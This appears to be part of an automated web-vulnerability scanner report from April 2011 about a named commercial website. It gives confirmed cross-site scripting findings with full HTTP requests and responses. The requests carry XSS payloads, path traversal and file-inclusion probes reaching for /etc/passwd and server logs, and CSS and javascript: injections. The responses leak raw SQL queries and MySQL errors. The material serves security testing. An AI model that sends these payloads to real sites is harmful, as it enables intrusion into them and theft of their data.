'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>' OR prj.project_page_url = 'leadflow/inco00/project.php?'"--></style></script><script>netsparker(0x0005C4)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005C4)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/bulo00/

/ppc/leadflow/bulo00/ CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Eal..

Parameters

Parameter Type Value
nsextt GET '"--></style></script><script>alert(0x0005C5)</script>

Request

GET /ppc/leadflow/bulo00/?nsextt='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005C5)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:31 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=jif068n8tgmj1t08tcl4g3bm92; path=/
Content-Length: 3033
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>' OR prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>' OR prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>' OR prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>' OR prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>' OR prj.project_page_url = 'leadflow/bulo00/?nsextt='"--></style></script><script>netsparker(0x0005C5)</script>/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005C5)</script>/' union select prj.catI' at line 5
- /ppc/leadflow/inco00/project.php

/ppc/leadflow/inco00/project.php CONFIRMED

http://www.insideup.com/ppc/leadflow/inco00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cs..

Parameters

Parameter Type Value
catId GET '"--></style></script><script>alert(0x0005C6)</script>
iusrc GET iupsc

Request

GET /ppc/leadflow/inco00/project.php?catId='%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005C6)%3C/script%3E&iusrc=iupsc HTTP/1.1
Referer: http://www.insideup.com/selectvendors.html
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[body{x:expression(netsparker(0x000352))}]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Wed, 20 Apr 2011 02:24:33 GMT
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Set-Cookie: PHPSESSID=2o4or6he96u741d4sm2mus3jp1; path=/
Content-Length: 3253
Connection: close
Content-Type: text/html; charset=UTF-8


select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_two_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_dynamic_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_video_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc/' union select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_mobile_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lead_flow_template temps on temps.template_id = prj.templateId left join lead_flow_group grps on grps.group_id = prj.groupId where prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc' OR prj.project_page_url = 'leadflow/inco00/project.php?catId='"--></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '></style></script><script>netsparker(0x0005C6)</script>&iusrc=iupsc/' union sel' at line 5
- /ppc/leadflow/bulo00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005C8)%3C/script%3E

/ppc/leadflow/bulo00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005C8)%3C/script%3E CONFIRMED

http://www.insideup.com/ppc/leadflow/bulo00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00..

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0005C8)</script>

Request

GET /ppc/leadflow/bulo00/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0005C8)%3C/script%3E HTTP/1.1
Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.insideup.com
Cookie: OAVARS[a08b960a\0\'\"--></style></script><script>netsparker(0x0002ED)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../etc/httpd/logs/error_log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache2/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[NSFTW]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[//netsparker.com/n/n.css?0x000308]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../var/log/apache/error.log]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[\'+NSFTW+\']=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../proc/self/version\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[javascript:netsparker(0x000323)]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%225%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[<script>ns(0x000332)</script>]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[../../../../../../../../../../../etc/passwd\0avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[avw.php]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; 